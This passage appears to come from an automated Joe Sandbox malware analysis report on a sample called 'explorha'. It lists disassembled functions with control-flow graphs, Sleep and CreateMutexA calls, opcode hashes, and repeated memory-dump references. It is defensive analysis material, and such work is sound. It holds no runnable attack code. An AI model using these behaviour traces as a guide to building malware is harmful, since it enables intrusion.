                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                        • Opcode ID: 7643514b589ef67b10c6670487b577ba6e4545282dd4a09f87b355fe6e48b6c7
                                                                                                                                                                                                                                        • Instruction ID: da78a9e1c2988654f7951ca5614683030952f7e5b040bb4e7f16f517186fb25e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7643514b589ef67b10c6670487b577ba6e4545282dd4a09f87b355fe6e48b6c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFE08CB044A20CEAEE39BB58D854E987B6DEB52350F110814F9049AA22CB29FC42C981
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709675 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 709675-709695 4 7096c3-7096df 0->4 5 709697-7096a3 0->5 8 7096e1-7096ed 4->8 9 70970d-70972c 4->9 6 7096a5-7096b3 5->6 7 7096b9-7096c0 call 71ecf8 5->7 6->7 12 70a3ec 6->12 7->4 14 709703-70970a call 71ecf8 8->14 15 7096ef-7096fd 8->15 10 70975a-70a3e6 call 719750 9->10 11 70972e-70973a 9->11 16 709750-709757 call 71ecf8 11->16 17 70973c-70974a 11->17 19 70a423-70a466 Sleep CreateMutexA 12->19 20 70a3ec call 7382fa 12->20 14->9 15->12 15->14 16->10 17->12 17->16 20->19
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: ca4f42defd9e926ded9363cc3127d5900b3d32d2b33466da7eba7c7b20108259
                                                                                                                                                                                                                                        • Instruction ID: d3c6ad5fabe54ab9c163523ba087cf8e9f44df7dd18125cce4c27af31038860b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca4f42defd9e926ded9363cc3127d5900b3d32d2b33466da7eba7c7b20108259
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF310572610204DBEB08DB6CCC897ADBAA6EB86314F208718E515D72D3D7BD59808791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709A14 Relevance: 3.1, APIs: 2, Instructions: 128sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 31 709a14-709a34 35 709a62-709a7e 31->35 36 709a36-709a42 31->36 39 709a80-709a8c 35->39 40 709aac-709acb 35->40 37 709a44-709a52 36->37 38 709a58-709a5f call 71ecf8 36->38 37->38 43 70a3fb 37->43 38->35 45 709aa2-709aa9 call 71ecf8 39->45 46 709a8e-709a9c 39->46 41 709af9-70a3e6 call 719750 40->41 42 709acd-709ad9 40->42 48 709adb-709ae9 42->48 49 709aef-709af6 call 71ecf8 42->49 51 70a423-70a466 Sleep CreateMutexA 43->51 52 70a3fb call 7382fa 43->52 45->40 46->43 46->45 48->43 48->49 49->41 52->51
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: dea28dc18a937a1505b085d73be4baf010dc748737391d73bd8586bc606623ff
                                                                                                                                                                                                                                        • Instruction ID: a3e3e66e9d1cd821183acd2760405af6a2138324c268fd192a00e27db47c7af5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dea28dc18a937a1505b085d73be4baf010dc748737391d73bd8586bc606623ff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC3135B1714244DBEB08DB6CCC887ADFBA2EB86314F208718E914D72D2E77D5980C751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709B49 Relevance: 3.1, APIs: 2, Instructions: 127sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 62 709b49-709b69 66 709b97-709bb3 62->66 67 709b6b-709b77 62->67 68 709be1-709c00 66->68 69 709bb5-709bc1 66->69 70 709b79-709b87 67->70 71 709b8d-709b94 call 71ecf8 67->71 74 709c02-709c0e 68->74 75 709c2e-70a3e6 call 719750 68->75 72 709bc3-709bd1 69->72 73 709bd7-709bde call 71ecf8 69->73 70->71 76 70a400 70->76 71->66 72->73 72->76 73->68 79 709c10-709c1e 74->79 80 709c24-709c2b call 71ecf8 74->80 82 70a423-70a466 Sleep CreateMutexA 76->82 83 70a400 call 7382fa 76->83 79->76 79->80 80->75 83->82
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 4d4d9fd37bf137020c4c2c7de1c01811e02b8390faef5164f6acc2884d73adb6
                                                                                                                                                                                                                                        • Instruction ID: ef9ce1ffdd69ec8666e18dca97f8bb06dd89b6215364db9943ff254e19267caa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d4d9fd37bf137020c4c2c7de1c01811e02b8390faef5164f6acc2884d73adb6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD3126B1604244DBFB08DB7CDC8979DBBE2EB86324F208718E915D72D2D7BD59808761
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709C7E Relevance: 3.1, APIs: 2, Instructions: 126sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 93 709c7e-709c9e 97 709ca0-709cac 93->97 98 709ccc-709ce8 93->98 99 709cc2-709cc9 call 71ecf8 97->99 100 709cae-709cbc 97->100 101 709d16-709d35 98->101 102 709cea-709cf6 98->102 99->98 100->99 103 70a405 100->103 107 709d63-70a3e6 call 719750 101->107 108 709d37-709d43 101->108 105 709cf8-709d06 102->105 106 709d0c-709d13 call 71ecf8 102->106 110 70a423-70a466 Sleep CreateMutexA 103->110 111 70a405 call 7382fa 103->111 105->103 105->106 106->101 114 709d45-709d53 108->114 115 709d59-709d60 call 71ecf8 108->115 111->110 114->103 114->115 115->107
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
